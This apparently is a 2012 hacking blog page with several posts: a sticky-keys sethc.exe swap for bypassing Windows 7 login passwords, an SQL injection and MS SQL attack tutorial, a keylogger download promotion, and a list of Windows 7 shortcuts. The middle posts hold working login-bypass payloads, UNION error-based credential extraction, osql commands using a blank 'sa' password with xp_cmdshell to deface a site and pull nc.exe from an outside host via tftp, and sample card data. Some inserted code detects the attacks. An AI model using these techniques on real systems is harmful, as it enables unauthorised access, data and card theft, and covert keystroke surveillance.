
Monday 30 April 2012

Removing Windows 7 User / Administrator Password


So, you forgot your password. I am here to help you just at the instant you asked for help. I will explain the process in my style: first the main concept and then its implementation. This way, I can force you to read all the content and upgrade your knowledge level somewhat. :P
“I am telling you for the educational purpose only. Use it at own risk. I am not responsible for any harm done by you to yourself and others.”
Let's get on.
If you have used Linux, you will know that there are two kinds of users in the Linux OS. The first is a simple user that has permission to perform normal routine work on the computer system to which he has access. The second is root. Root has all sorts of permissions you can think of.
The same is the case for Windows. We too have two kinds of users in Windows: one is User (having normal administrative privileges) and the other is Administrator. We think that the Administrator has all the power in his hand and that we can do anything with this account. However, it is not true. Administrator does not hold total power. If you are a keen observer and somewhat experimental in nature, you must have noticed in Windows XP that some processes started by the owner SYSTEM cannot be ended even by the Administrator.
So, I think you have got the real player behind the game.
Administrator is the user account that certainly has more administrative powers than the normal user but does not have all of them. It is a sort of power user. In Windows XP, most users do not tamper with this Administrator account, so it is easy to press Ctrl+Alt+Del on the login window, type Administrator in the User field and hit Enter; by doing this you get into the Administrator account and can remove the password of the victim.
But you can't do this in Windows 7; you do not get that login user and password window here. And even in the case of Windows XP, if the original and genuine user has set a password on all the available accounts including Administrator, you would have been stuck there.
Till now, I have told you about the root user of Windows and one old trick for breaking a Windows XP password.
Windows employs a File Protection System (FPS). This protection is mostly responsible for keeping you within the limits decided by your authorization level. So, it simply means that if you want to have a date with the SAM file, you will have to get rid of the FPS. It is not an easy task, because FPS gets switched on the moment you see your login screen. So, it simply means that you need to do whatever you want while Windows is not running, I mean when there is another OS on your computer.
Linux Live CDs would come to your rescue. They give you a live demo of how a Linux machine looks. You won't need to install Linux on your HDD.
Well, before I tell you about the actual procedure, I would like to tell you about the methods I tried to get rid of the password. I tried 4 methods. The fourth one is the universal method that I found.
1) Firstly, I thought of renaming the SAM file located in the C:\Windows\System32\Config folder. On some in-depth reading and researching, I found that this method only works for Windows XP SP1. If you do it on any Windows after XP SP1, you will be welcomed by a warning message declaring that the SAM file is corrupted, and then your computer will reboot. If you do it on Windows 7, you will not be fortunate enough to know what the hell has happened to your computer. Your computer will keep on rebooting at the boot screen.
2) Secondly, I thought that I should replace the whole Config folder of the target computer with my own Config folder (which does not have a password). This method will work if you have two systems of the same architecture and the same configuration. And if you do not have that, you will be welcomed by a BSoD (Blue Screen of Death).
3) Another alternative could have been copying the SAM and SYSTEM files from the Repair folder in C:\Windows\Repair. This method will work if this folder exists on your computer. I mean, it does not exist in Windows 7, but it is there in the later two service packs of Windows XP (SP2 and SP3). It will take your computer back to its ICE AGE: I mean you will have no drivers installed and no software. But certainly, it would work. :)
4) In the 4th and final method I tried, I used a Linux Live CD and got into the Windows file system.
Let me explain everything with the help of screenshots.
This picture shows that I really have a computer with Windows 7 where I forgot the password intentionally to write this post :) .
Login Screen
You need to have a Linux Live CD. I am using VirtualBox for demonstrating the break-in. However, today most motherboards support booting from a pen drive, so it would be fine if you just make a pen drive bootable and try the Linux live CD from that.
So, I booted into Linux; this screenshot shows the options you need to choose to go on. Hit "Try Ubuntu". Then you will see the Ubuntu desktop after you get into it.
And the desktop looks like this.
After this, click on the toolbar option "Places". A drop-down menu comes up in which you are required to select the "Computer" option. You can select any other option too. The Computer option leads you to a window like this:
I am showing you this on VirtualBox, so I have made just one partition of size 11 GB. You would have to recognise the correct Windows partition, the C drive. It can be done simply by opening each partition and examining the files and folders in it.
I opened the partition and I got the files.
As you can see, I got the Windows folder here. It is the system root drive, the C drive. Now, first navigate to the C:\Windows\System32 folder and locate the file sethc.exe. Select the file and right-click it. Go to another location on your computer, anywhere, right-click and create a new folder, and copy this file (sethc.exe) there. Now locate the cmd.exe file, copy it to another location, rename it to sethc.exe and place it in C:\Windows\System32. Now you can exit the Linux Live CD. I hope you will be able to do the copy-paste by yourself.
So, after you have done this, restart your computer. If you used a CD drive, remove the CD; if you used a pen drive, remove your pen drive. Now, again you will see the same login screen asking for a password. :(
However, if you press the Shift key 5 times, or hold it for nearly 8 seconds, a change happens. Let us see what will happen.
The command prompt that appears here is very, very special. The first reason is that it is not nagging me for a password. Secondly, it is running in the supreme user mode available in Windows.
If you want to know it, just type "whoami". It will tell you who it is.
The main point is to remove the password. It is most simple. Just type
net user username *
and press Enter two times, or enter the new password. The password will be reset. Here, username stands for your username, which in our case is Demo. Another thing to note is that there is a space between the username and *.
You can exit the cmd by typing exit. And if you have not entered any password, then do not type anything into the password field, only press Enter. You will be forwarded to the desktop.
Now, time for some explanation. The sethc.exe process is responsible for two types of keys: Sticky Keys and Filter Keys. I have replaced sethc.exe with the command prompt. So, when the system call tries to invoke the sethc.exe process, it launches cmd. Since no user has logged in yet, the command prompt uses an account which is always logged in: SYSTEM, the most powerful account in Windows 7. Through this cmd, you hold all the power to do anything to this computer, and hence you changed the password.
You can use this method on Windows XP. The only thing that would not work in XP is the whoami command. Everything else would be the same as above.
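For the defender's side of the swap described above, here is an added example (not from the original post) that detects a sethc.exe which has been replaced by a copy of cmd.exe by comparing file hashes. It assumes only that both binaries sit in a System32-style directory; the demo directory it builds is constructed from fake bytes, not real executables.

```python
"""Detect the sethc.exe-for-cmd.exe swap described above by comparing file hashes.

Added example, not part of the original post. It assumes only that the two
binaries sit side by side in a System32-style directory; everything is done
with plain file reads, so it can be run against copied files or against the
constructed demo directory built by build_demo_dir().
"""
import hashlib
import os
import tempfile


def sha256_of(path):
    """Return the SHA-256 hex digest of a file, read in 64 KiB chunks."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def check_sethc(system32_dir, reference_sha256=None):
    """Classify the sethc.exe found in system32_dir.

    Returns one of:
      "missing"            - sethc.exe or cmd.exe is not there
      "replaced_with_cmd"  - sethc.exe is byte-identical to cmd.exe (the swap
                             the post performs from the live CD)
      "hash_mismatch"      - a known-good hash was given and does not match
      "ok"                 - nothing suspicious found
    """
    sethc = os.path.join(system32_dir, "sethc.exe")
    cmd = os.path.join(system32_dir, "cmd.exe")
    if not (os.path.isfile(sethc) and os.path.isfile(cmd)):
        return "missing"
    sethc_hash = sha256_of(sethc)
    if sethc_hash == sha256_of(cmd):
        return "replaced_with_cmd"
    if reference_sha256 is not None and sethc_hash != reference_sha256.lower():
        return "hash_mismatch"
    return "ok"


def build_demo_dir(swapped):
    """Constructed stand-in for System32: two small fake binaries.

    When swapped is True, 'sethc.exe' gets the same bytes as 'cmd.exe',
    mimicking the copy-and-rename step in the post. Returns the directory.
    """
    root = tempfile.mkdtemp(prefix="fake_system32_")
    cmd_bytes = b"MZ fake cmd.exe bytes"            # constructed, not a real PE
    sethc_bytes = cmd_bytes if swapped else b"MZ fake sethc.exe bytes"
    with open(os.path.join(root, "cmd.exe"), "wb") as fh:
        fh.write(cmd_bytes)
    with open(os.path.join(root, "sethc.exe"), "wb") as fh:
        fh.write(sethc_bytes)
    return root


if __name__ == "__main__":
    # Demo on constructed directories; on a real host pass
    # os.path.join(os.environ["SystemRoot"], "System32") instead.
    for swapped in (False, True):
        print("swapped=%s -> %s" % (swapped, check_sethc(build_demo_dir(swapped))))
```

A known-good hash for the second argument should come from your own clean build of the same Windows version; the byte-identical check alone already catches the plain copy-and-rename trick.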

Monday 23 April 2012

Hacking Database Server




Databases have been the heart of commercial websites. An attack on the database servers can cause a great monetary loss for the company. Database servers are usually hacked to get credit card information, and just one hack on a commercial site will bring down its reputation and also its customers, as they want their credit card info secured. Most commercial websites use Microsoft SQL Server (MSSQL) or Oracle database servers. MSSQL still owns the market because the price is very low, while Oracle servers come at a high price. Well, some time ago Oracle claimed itself to be "unbreakable", but hackers took it as a challenge and showed lots of bugs in it too!! I have been addicted to hacking database servers for a few months, so I just decided to share the knowledge with others. Well, the things discussed here were not discovered by me, OK. Yeah, I experimented with them a lot.

The user will type his login name and password in the login.htm page and click the submit button. The values of the text boxes will be passed to the logincheck.asp page, where they will be checked using the query string. If it doesn't get an entry satisfying the query and reaches end of file, a message of login failed will be displayed. Everything seems to be OK. But wait a minute. Think again. Is everything really OK?!! What about the query?!! Is it OK? Well, if you have made a page like this, then a hacker can easily log in successfully without knowing the password. How? Let's look at the query again.

"Select * from table1 where login='"&log& "' and password='" &pwd& "' "
 

Now if a user types his login name as "Chintan" and password as "h4x3r", then these values will be passed to the ASP page with the POST method and the above query will become
 

"Select * from table1 where login=' Chintan ' and password=' h4x3r ' "
 

That's fine. There will be an entry Chintan and h4x3r in the login and password fields in the database, so we will receive a message of login successful. Now what if I type the login name as "Chintan" and, in the password text box, the password as hi' or 'a'='a ? The query will become as follows:

"Select * from table1 where login=' Chintan ' and password=' hi' or 'a'='a ' "
 

Submit, and bingo!!!!! I will get the message Login successful!! Did you see the smartness of the hacker, which was due to the carelessness of the web designer?!!

The query gets satisfied as the query changes: the password needs to be 'hi' or 'a' needs to be equal to 'a'. Clearly the password is not 'hi', but at the same time 'a'='a'. So the condition is satisfied, and a hacker is in with login "Chintan"!! You can try the following in the password text box if the above doesn't work for some websites:

hi" or "a"="a
 
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a

Here, the -- above makes the rest of the query string a comment, so the other conditions will not be checked. Similarly, you can provide
 

Chintan ' --
 
Chintan " --

or other such possibilities in the login name text box, with anything as the password, which might let you in, because in the query string only the login name is checked as "Chintan" and the rest is ignored due to --. Well, if you are lucky enough to get a website where the web designer has made the above mistake, then you will be able to log in as any user!!!
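To show why the login check above fails and what the fix looks like, here is an added example (not from the original post) that runs the same query both ways: built by string concatenation exactly as above, and with bound parameters. It assumes an in-memory SQLite table standing in for the ASP page's back end, with the constructed row Chintan / h4x3r from the post.

```python
"""Vulnerable vs. parameterised login check for the query discussed above.

Added example, not part of the original post. SQLite stands in for the
SQL Server back end of logincheck.asp; 'table1' and its single row are
constructed to match the post's example.
"""
import sqlite3


def make_db():
    """Constructed sample database: one user row, mirroring the post."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE table1 (login TEXT, password TEXT)")
    conn.execute("INSERT INTO table1 VALUES ('Chintan', 'h4x3r')")
    return conn


def login_concat(conn, log, pwd):
    """The post's pattern: user input pasted straight into the SQL string.

    Returns True when the resulting query matches at least one row. A query
    that no longer parses (e.g. unbalanced quotes) counts as a failed login.
    """
    sql = ("SELECT * FROM table1 WHERE login='" + log +
           "' AND password='" + pwd + "'")
    try:
        return conn.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False


def login_param(conn, log, pwd):
    """Same check with bound parameters: the input is data, never SQL."""
    sql = "SELECT * FROM table1 WHERE login=? AND password=?"
    return conn.execute(sql, (log, pwd)).fetchone() is not None


def compare(log, pwd):
    """Run both checks on one input; returns (concat_result, param_result)."""
    conn = make_db()
    try:
        return login_concat(conn, log, pwd), login_param(conn, log, pwd)
    finally:
        conn.close()


if __name__ == "__main__":
    # The payloads listed in the post, plus the genuine credentials.
    for log, pwd in [("Chintan", "h4x3r"),
                     ("Chintan", "hi' or 'a'='a"),
                     ("Chintan", "hi' or 1=1 --"),
                     ("Chintan' --", "anything"),
                     ("Chintan", "wrong")]:
        print("%-12r %-16r concat=%s param=%s" % ((log, pwd) + compare(log, pwd)))
```

The concatenated version accepts every tautology payload from the post because the quote closes the string literal and the rest becomes SQL; the parameterised version accepts only the real credentials.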
 

IMP NOTE: Hey guys, I have put up a page where you can experiment for yourself with the SQL injection vulnerability. Just go to www33.brinkster.com/chintantrivedi/login.htm
More advanced hacking of databases using ODBC error messages!!!
--------------------------------------------------------------

Above we saw how to log in successfully without knowing the password. Now over here I will show you how to read the whole database just by using queries in the URL!! And this works only for IIS, i.e. ASP pages. And we know that IIS covers almost 35% of the web market, so you will definitely get a victim after searching just a few websites. You might have seen something like

http://www.nosecurity.com/mypage.asp?id=45
 

in URLs. The '?' there shows that after it, the value 45 is passed to a hidden data type id. Well, if you don't understand, then recall the above example in login.htm, which had two input text types with the names 'login_name' and 'pass', and their values were passed to the logincheck.asp page. The same thing can be done by directly opening the logincheck.asp page using
 
http://www.nosecurity.com/logincheck.asp?login_name=Chintan&pass=h4x3r
in the URL if method="get" is used instead of method="post".

Note: The difference between the GET and POST methods is that the POST method doesn't show the values passed to the next page in the URL, while the GET method shows the values. To get more understanding of how they internally work, read the HTTP protocol RFCs 1945 and 2616.

What I mean to say is that after '?' the variables which are going to be used in that page are assigned their values. As above, login_name is given the value Chintan. And different variables are separated by the '&' operator.
 

OK, so coming back: id will mostly be a hidden type, and according to the links you click, its value will change. This value of id is then passed into the query in the mypage.asp page, and according to the results you get the desired page on your screen. Now if you just change the value of id to 46, then you will get a different page.

Now let's start hacking the database. Let's use the magic of queries. Just type

http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--
 

in the URL. INFORMATION_SCHEMA.TABLES is a system table which contains information about all the tables on the server. In it there is a field TABLE_NAME which contains the names of all the tables. See the query again

SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES

The result of this query is the first table name from the INFORMATION_SCHEMA.TABLES table. But the result we get is a table name, which is a string (nvarchar), and we are uniting it with 45 (integer) by UNION. So we will get an error message like

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'logintable' to a column of data type int.
/mypage.asp, line

From the error it's clear that the first table is 'logintable'. It seems that this table might contain login names and passwords :-) So let's move into it. Type the following in the URL
 

http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable'--
 

Output:
 
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'login_id' to a column of data type int.
/index.asp, line 5

The above error message shows that the first field or column in logintable is login_id. To get the next column name we will type


http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' AND COLUMN_NAME NOT IN ('login_id')--
 

Output:
 
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'login_name' to a column of data type int.
/index.asp, line 5

So we get one more field name, 'login_name'. To get the third field name we will write


http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' AND COLUMN_NAME NOT IN ('login_id','login_name')--
 

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
 
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'passwd' to a column of data type int.
/index.asp, line 5

That's it. We ultimately get the 'passwd' field. Now let's get the login names and passwords from this table "logintable". Type

http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 login_name FROM logintable--
 

Output:
 
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'Rahul' to a column of data type int.
/index.asp, line 5

That's the login name "Rahul", and to get the password of Rahul the query would be


http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 passwd FROM logintable WHERE login_name='Rahul'--

Output:
 
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'P455w0rd' to a column of data type int.
/index.asp, line 5

Voila!! Login name: Rahul and password: P455w0rd. You have cracked the database of www.nosecurity.com, and it was possible because the user's request was not checked properly. SQL injection vulnerabilities still exist on many websites. The best solution is to parse the user requests and filter out characters such as ', ", --, :, etc.
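Beyond fixing the query itself, a defender wants to see these probes when they arrive. As an added example (not from the original post), the following scans IIS-style W3C log lines for the request patterns used in the walkthrough above; the log lines are constructed, the field order is assumed, and the signatures are illustrative rather than exhaustive.

```python
"""Flag SQL-injection probes like the requests above in IIS W3C log lines.

Added example, not part of the original post. The log lines are constructed
(W3C extended format with an assumed fixed field order: date time c-ip
cs-method cs-uri-stem cs-uri-query sc-status). The signatures are taken from
the URLs shown above and are matched on the URL-decoded query string.
"""
import re
from urllib.parse import unquote_plus

# Signatures derived from the requests in the walkthrough above.
PATTERNS = {
    "union_select": re.compile(r"\bunion\b.*\bselect\b", re.I | re.S),
    "schema_probe": re.compile(r"information_schema\.(tables|columns)", re.I),
    "comment_tail": re.compile(r"--\s*$"),
    "tautology": re.compile(r"'\s*or\s+'?\w+'?\s*=\s*'?\w+'?", re.I),
}

# Constructed sample log: a normal page view, the first schema probe, the
# login-form tautology, and another normal view from a different client.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2012-04-23 10:00:01 10.0.0.5 GET /mypage.asp id=45 200
2012-04-23 10:00:07 10.0.0.5 GET /mypage.asp id=45%20UNION%20SELECT%20TOP%201%20TABLE_NAME%20FROM%20INFORMATION_SCHEMA.TABLES-- 500
2012-04-23 10:00:09 10.0.0.5 GET /logincheck.asp login_name=Chintan&pass=hi'%20or%20'a'='a 200
2012-04-23 10:00:15 10.0.0.9 GET /mypage.asp id=46 200
"""


def parse_line(line):
    """Split one log line into a dict; None for directives or short lines."""
    fields = line.split(" ")
    if line.startswith("#") or len(fields) < 7:
        return None
    date, time, ip, method, stem, query, status = fields[:7]
    return {"date": date, "time": time, "ip": ip, "method": method,
            "stem": stem, "query": query, "status": status}


def classify_query(query):
    """Return the sorted names of the signatures that fire on the decoded query."""
    decoded = unquote_plus(query)
    return sorted(name for name, rx in PATTERNS.items() if rx.search(decoded))


def scan_log(text):
    """Return (client ip, page, signatures) for every line that trips a signature."""
    hits = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        tags = classify_query(rec["query"])
        if tags:
            hits.append((rec["ip"], rec["stem"], tags))
    return hits


if __name__ == "__main__":
    for ip, stem, tags in scan_log(SAMPLE_LOG):
        print(ip, stem, ",".join(tags))
```

Decoding the query string before matching matters because the probes above reach the server percent-encoded; the 500 status on the UNION line is the ODBC error page the walkthrough relies on, which is itself worth alerting on.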

Part II - using port 1434 (SQL port)
-------------------------------------

Well, up till now we have seen how to break the database using malformed URLs, but that was done using just port 80 (the HTTP port). This time we will use port 1434 for hacking. Before that, we will see what database servers actually are and how they work, and then how to exploit them!
 

The designers of MS SQL shipped some default stored procedures along with the product to make things flexible for web designers. A procedure is nothing but a function which can be used to perform some action on the arguments passed to it. These procedures are very important to hackers. Some of the important ones are
 

sp_password -> Changes the password for a specific login name.
e.g. EXEC sp_password 'oldpass', 'newpass', 'username'

sp_tables -> Shows all the tables in the current database.
e.g. EXEC sp_tables

xp_cmdshell -> Runs an arbitrary command on the machine with administrator privileges. (most important)

xp_msver -> Shows the MS SQL Server version, including all the info about the OS.
e.g. master..xp_msver

xp_regdeletekey -> Deletes a registry key.

xp_regdeletevalue -> Deletes a registry value.

xp_regread -> Reads a registry value.

xp_regwrite -> Writes a registry key.

xp_terminate_process -> Stops a process.
 

Well, these are some important procedures. Actually there are more than 50 such procedures. If you want your MS SQL Server to be protected, then I would recommend deleting all of these procedures. The trick: open the master database using MS SQL Server Enterprise Manager, expand the Extended Stored Procedures folder, and delete each stored procedure by right-clicking it and choosing delete.
 

Note: "master" is an important database of SQL Server which contains all the system information, like login names and system stored procedures. So if a hacker deletes this master database, then the SQL Server will be down forever. syslogins is the default system table which contains the usernames and passwords of the logins in the database.
 


Most dangerous threat: Microsoft SQL Server has a default username "sa" with a blank password "". And this has ruined lots of MS SQL servers in the past. Even a virus targeting this vulnerability has been released.
 

That's enough. Let's hack now. First we need to find a vulnerable server. Download a good port scanner (there are many out there on the web) and scan for IP addresses having port 1433/1434 (TCP or UDP) open. This is the MS SQL port on which the SQL service runs. Oracle's port number is 1521. Let's suppose we got a vulnerable server with IP 198.188.178.1 (it's just an example, so don't even try it). Now there are many ways to use the SQL service, like telnet or netcat to port number 1433/1434. You can also use a tool known as osql.exe which ships with any SQL Server 2000. OK. Now go to the DOS prompt and type.
 

C:>osql.exe -?
 
osql: unknown option ?
usage: osql [-U login id] [-P password]
[-S server] [-H hostname] [-E trusted connection]
[-d use database name] [-l login timeout] [-t query timeout]
[-h headers] [-s colseparator] [-w columnwidth]
[-a packetsize] [-e echo input] [-I Enable Quoted Identifiers]
[-L list servers] [-c cmdend]
[-q "cmdline query"] [-Q "cmdline query" and exit]
[-n remove numbering] [-m errorlevel]
[-r msgs to stderr] [-V severitylevel]
[-i inputfile] [-o outputfile]
[-p print statistics] [-b On error batch abort]
[-O use Old ISQL behavior disables the following]
batch processing
Auto console width scaling
Wide messages
default errorlevel is -1 vs 1
[-? show syntax summary]

Well, this displays the help of the osql tool. It's clear from the help what we have to do now. Type
 

C:\> osql.exe -S 198.188.178.1 -U sa -P ""
 
1>
That's what we get if we log in successfully; else we will get an error message: login failed for user "sa".

Now if we want to execute any command on the remote machine, then just use the "xp_cmdshell" default stored procedure.
 

C:\> osql.exe -S 198.188.178.1 -U sa -P "" -Q "exec master..xp_cmdshell 'dir >dir.txt'"
 

I would prefer to use the -Q option instead of -q because it exits after executing the query. In the same manner we can execute any command on the remote machine. We can even upload or download any files to/from the remote machine. A smart attacker will install a backdoor on the machine to gain access in the future as well. Now, as I explained earlier, we can use "information_schema.tables" to get the list of tables and their contents.
 

C:\> osql.exe -S 198.188.178.1 -U sa -P "" -Q "select * from information_schema.tables"
 

And after getting the table names, look for some table like login or accounts or users, or something like that, which seems to contain some important info like credit card numbers, etc.
 

C:\> osql.exe -S 198.188.178.1 -U sa -P "" -Q "select * from users"
 

And
 

C:\> osql.exe -S 198.188.178.1 -U sa -P "" -Q "select username, creditcard, expdate from users"
 

Output:
 

Username creditcard expdate
 
----------- ------------ ----------
Jack 5935023473209871 2004-10-03 00:00:00.000
Jill 5839203921948323 2004-07-02 00:00:00.000
Micheal 5732009850338493 2004-08-07 00:00:00.000
Ronak 5738203981300410 2004-03-02 00:00:00.000

Want to write something into the index.html file?
 

C:\> osql.exe -S 198.188.178.1 -U sa -P "" -Q "exec master..xp_cmdshell 'echo defaced by Chintan > C:\inetpub\wwwroot\index.html'"
 

Want to upload a file to the remote system?
 

C:\> osql.exe -S 198.188.178.1 -U sa -P "" -Q "exec master..xp_cmdshell 'tftp 203.192.16.12 GET nc.exe c:\nc.exe'"
 

And to download any file we can use the PUT request instead of GET. It's just because these commands are being executed on the remote machine and not on ours. So if you give the GET request, the command will be executed on the remote machine and it will try to get the nc.exe file from our machine to the remote machine.
 

That's not over. Tools for hacking the login passwords of SQL servers are easily available on the web. Even many buffer overflows are being discovered which can allow a user to gain complete control of the system with administrator privileges. This article is just giving some general issues about database servers.
 

Remember the Sapphire worm, which was released on 25th January? The worm exploited three known vulnerabilities in SQL servers using UDP ports 1433/1434.
 

Precautionary measures
---------------------------

<*> Change the default password for sa.
<*> Delete all the default stored procedures.
<*> Filter out all the characters like ', ", --, :, etc.
<*> Keep up to date with patches.
<*> Block the MS SQL ports 1433/1434 and the Oracle port 1521 using firewalls.

Remember, security is not an add-on feature. It depends upon the smartness of the administrator. The war between the hacker and the administrator will go on and on and on.... The person who is aware of the latest news or bug reports will win the war. Database admins should keep in touch with some sites.

Friday 20 April 2012

Home Key Logger - Free Download

Key logger:
It is application software which is used to capture all the inputs given by the keyboard and save them in a Word document. We cannot easily get free key logger software online.

Home Key Logger is a free key logger. Please click the download button and use it. (Sometimes a firewall may block this key logger. Configure it and use this key logger.)

Download Home KeyLogger

Wednesday 18 April 2012

Windows 7 shortcut keys


Windows 7 Shortcut Keys

New in Windows 7

The → symbol stands for the right arrow key, ← for the left arrow key, etc.

Win+↑    Maximize the current window
Win+↓    If the current window is maximized, restore it; if the current window is restored, minimize it
Win+←    Dock the current window to the left half of the screen
*If it is already docked left, it is moved to the right half of the screen
*If it is already docked right, it is restored to its original size
Win+→    Dock the current window to the right half of the screen
*If it is already docked right, it is moved to the left half of the screen
*If it is already docked left, it is restored to its original size
Win+Shift+←    Move current window to the left monitor (with dual monitors)
Win+Shift+→    Move current window to the right monitor (with dual monitors)
Win+Home    Minimize all but the current window
Win+Space    Peek at the desktop
Win+[Plus sign]    Zoom in
Win+[Minus sign]    Zoom out
Win+P    Open the projection menu (generally used for laptops connected to projectors)
Alt+P    In Explorer, show/hide the preview pane
Taskbar Modifiers (New in Windows 7)

Shift+Click    Open a new instance of the program
Ctrl+Click    Cycle between windows in a group
Middle Click    Open a new instance of the program
Ctrl+Shift+Click    Open a new instance of the program as Administrator
Shift+Right-Click    Show window menu
Managing Windows

Alt+F4    Close the active window
Alt+Tab    Switch to previous active window
Alt+Esc    Cycle through all open windows
Win+Tab    Flip 3D
Ctrl+Win+Tab    Persistent Flip 3D
Win+T    Cycle through applications on taskbar (showing its live preview)
Win+M    Minimize all open windows
Win+Shift+M    Undo all window minimization
Win+D    Toggle showing the desktop
Win+↑    Maximize the current window
Win+↓    If the current window is maximized, restore it; if the current window is restored, minimize it
Win+←    Dock the current window to the left half of the screen
*If it is already docked left, it is moved to the right half of the screen
*If it is already docked right, it is restored to its original size
Win+→    Dock the current window to the right half of the screen
*If it is already docked right, it is moved to the left half of the screen
*If it is already docked left, it is restored to its original size
Win+Shift+←    Move current window to the left monitor (with dual monitors)
Win+Shift+→    Move current window to the right monitor (with dual monitors)
Win+Home    Minimize all but the current window
Win+Space    Peek at the desktop
Win+[Plus sign]    Zoom in
Win+[Minus sign]    Zoom out
Starting Programs

Win+1    Open the first program on your Quick Launch bar
Win+2    Open the second program on your Quick Launch bar
Win+n    Open the nth program on your Quick Launch bar
Win+U    Open the ease of access center
Win+F    Open the search window
Win+X    Open the Mobility Center
Win+E    Open Explorer
Win+R    Open the Run window
Win+B    Move focus to notification tray (the right-most portion of the taskbar)
Win+P    Open the projection menu (generally used for laptops connected to projectors)
Win+Pause    Open the System Properties portion from the Control Panel
Ctrl+Shift+Esc    Open Windows Task Manager
Logging In And Out

While the below shortcuts seem unwieldy because of their length, they're quite easy to remember once you try them out a few times.

Win, →, Enter    Shutdown
Win, →, →, R    Restart
Win, →, →, S    Sleep
Win, →, →, W    Switch Users
Win+L    Locks computer
Viewing Folders With Explorer

Alt+←    Go back
Alt+→    Go forward
Alt+↑    Go up a directory
Alt+D    Move focus to address bar
Alt+D, Tab    Move focus to search bar
Alt+Enter    Open the Properties window of the current selection
Ctrl+Mousewheel    Change the view type (extra large, small, list view, detail, etc.)
Alt+P    Show/hide the preview pane